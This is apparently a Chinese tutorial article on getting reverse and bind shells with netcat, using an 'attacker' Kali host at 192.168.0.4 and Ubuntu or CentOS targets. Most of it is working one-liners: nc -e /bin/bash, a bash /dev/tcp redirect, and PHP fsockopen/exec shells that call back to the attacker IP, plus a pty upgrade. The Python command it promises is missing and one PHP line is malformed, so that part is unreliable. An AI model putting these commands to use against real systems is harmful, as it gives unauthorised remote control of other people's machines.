詳解NC反彈shell的幾種方法
假如ubuntu、CentOS為目標(biāo)服務(wù)器系統(tǒng)
kali為攻擊者的系統(tǒng),ip為:192.168.0.4,開放7777端口且沒被占用
最終是將ubuntu、CentOS的shell反彈到kali上
正向反彈shell
ubuntu或者CentOS上面輸入
nc -lvp 7777 -e /bin/bash
kali上輸入
nc ip 7777
正向反彈是目標(biāo)機(jī)先執(zhí)行nc命令,然后kali上再進(jìn)行nc監(jiān)聽,即可反彈shell。
需要目標(biāo)機(jī)安裝nc。
反向反彈shell
方法1:bash反彈
bash -i >& /dev/tcp/ip/port 0>&1
但首先需要在kali上使用nc監(jiān)聽端口:
nc -lvp 7777
此方法在ubuntu下不會反彈成功,CentOS可以反彈成功。
方法2:python反彈
反彈shell的命令如下:
首先,使用nc在kali上監(jiān)聽端口:
nc -lvp 7777
在CentOS或者ubuntu下使用python去反向連接,輸入:
此方法ubuntu和Linux均反彈成功。
方法3
首先在kali上輸入nc監(jiān)聽:
nc -lvp 7777
在CentOS或者ubuntu 上使用nc去反向連接,命令如下:
nc -e /bin/bash 192.168.0.4 7777
方法4:php反彈shell
首先在kali上輸入:
nc -lvp 7777
然后在目標(biāo)機(jī)上輸入:
php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'
或
php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
注意php反彈shell的這些方法都需要php關(guān)閉safe_mode這個選項,才可以使用exec函數(shù)。
遇到反彈后不是正常的shell,可用命令:
python -c 'import pty;pty.spawn("/bin/bash")'
轉(zhuǎn)化為常規(guī)的shell。
到此這篇關(guān)于詳解NC反彈shell的幾種方法的文章就介紹到這了,更多相關(guān)NC反彈shell內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
jenkins+shell自動化部署的實(shí)現(xiàn)步驟
本文主要介紹了jenkins+shell自動化部署的實(shí)現(xiàn)步驟,通過jenkins與shell腳本相結(jié)合,實(shí)現(xiàn)war包自動部署到多臺服務(wù)器上,感興趣的可以了解一下2022-04-04Shell腳本實(shí)現(xiàn)防止國外ip訪問服務(wù)器
這篇文章主要介紹了Shell腳本實(shí)現(xiàn)防止國外ip訪問服務(wù)器,本文通過分析使用IP地址庫,然后把國外IP指導(dǎo)入iptables并禁止訪問實(shí)現(xiàn),需要的朋友可以參考下2014-12-12linux命令行bandit使用練習(xí)實(shí)戰(zhàn)
這篇文章主要為大家介紹了linux命令行bandit使用練習(xí)實(shí)戰(zhàn),有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2023-08-08關(guān)于Linux之grep查找文本時匹配反斜杠\轉(zhuǎn)義問題
在Linux系統(tǒng)中,當(dāng)文本中有反斜杠?,?需要使用grep查找出帶有反斜杠的內(nèi)容,接下來通過本文給大家講解Linux之grep查找文本時匹配反斜杠\轉(zhuǎn)義問題,需要的朋友可以參考下2022-10-10awk中NR和FNR的區(qū)別小結(jié)和實(shí)例演示
這篇文章主要介紹了awk中NR和FNR的區(qū)別小結(jié)和實(shí)例演示,著重介紹NR和FNR不同的地方,需要的朋友可以參考下2014-07-07shell基礎(chǔ)學(xué)習(xí)中的字符串操作、for循環(huán)語句示例
這篇文章主要介紹了shell基礎(chǔ)學(xué)習(xí)中的字符串操作、for循環(huán)語句示例2014-04-04